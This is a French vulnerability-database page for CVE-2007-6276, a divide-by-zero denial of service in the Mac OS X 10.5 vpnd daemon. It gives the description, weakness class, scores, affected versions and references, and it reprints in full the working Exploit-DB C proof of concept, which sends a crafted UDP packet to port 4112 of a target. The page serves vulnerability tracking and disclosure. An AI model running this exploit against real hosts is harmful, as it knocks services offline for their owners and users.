CVE-2007-6276 : Détail

CVE-2007-6276

14%V4
Network
2007-12-07
10h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The accept_connections function in the virtual private network daemon (vpnd) in Apple Mac OS X 10.5 before 10.5.4 allows remote attackers to cause a denial of service (divide-by-zero error and daemon crash) via a crafted load balancing packet to UDP port 4112.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 4690

Date de publication : 2007-12-03 23h00 +00:00
Auteur : mu-b
EDB Vérifié : Yes

/* vpnd-leopard-lb-dos.c * * Copyright (c) 2007 by <mu-b@digit-labs.org> * * Apple MACOS X 10.5.0 (leopard) vpnd remote DoS POC * by mu-b - Fri 9 Nov 2007 * * - Tested on: Apple MACOS X 10.5.0 (leopard) vpnd * * Program received signal EXC_ARITHMETIC, Arithmetic exception. * 0x00004828 in accept_connections () * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #include <sys/types.h> #define DEF_PORT 4112 #define PORT_VPND DEF_PORT static char abuf[] = "\x00\x01\x00\x18" "\x00\x00\x00\x00" "\xd5\xa5\xf9\xc3" "\x00\x00" /* [edi+0Ch] -> ecx == 0 */ "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\x00\x00"; static void zattack (char *host); static void zattack (char *host) { struct sockaddr_in address; struct hostent *hp; int fd, n; if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) == -1) { perror ("socket()"); exit (EXIT_FAILURE); } if ((hp = gethostbyname (host)) == NULL) { perror ("gethostbyname()"); exit (EXIT_FAILURE); } memset (&address, 0, sizeof (address)); memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); address.sin_port = htons (PORT_VPND); printf ("+Attacking %s:%d\n", host, PORT_VPND); n = sendto (fd, abuf, sizeof abuf - 1, 0, (struct sockaddr *) &address, sizeof address); if (n != sizeof abuf - 1) { fprintf (stderr, "zattack: sendto %d != %d\n", n, sizeof abuf - 1); exit (EXIT_FAILURE); } close (fd); } int main (int argc, char **argv) { printf ("Apple MACOS X 10.5.0 (leopard) vpnd remote DoS PoC\n" "by: <mu-b@digit-labs.org>\n" "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); if (argc <= 1) { fprintf (stderr, "Usage: %s <host>\n", argv[0]); exit (EXIT_SUCCESS); } zattack (argv[1]); printf ("+Wh00t!\n"); return (EXIT_SUCCESS); } // milw0rm.com [2007-12-04]

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version 10.5

Apple>>Mac_os_x >> Version 10.5.1

Apple>>Mac_os_x >> Version 10.5.2

Apple>>Mac_os_x >> Version 10.5.3

Apple>>Mac_os_x_server >> Version 10.5

Apple>>Mac_os_x_server >> Version 10.5.1

Apple>>Mac_os_x_server >> Version 10.5.2

Apple>>Mac_os_x_server >> Version 10.5.3

Références

http://support.apple.com/kb/HT2163
Tags : x_refsource_CONFIRM
http://www.securityfocus.com/bid/26699
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2007/4145
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/27938
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/30802
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1019052
Tags : vdb-entry, x_refsource_SECTRACK
https://www.exploit-db.com/exploits/4690
Tags : exploit, x_refsource_EXPLOIT-DB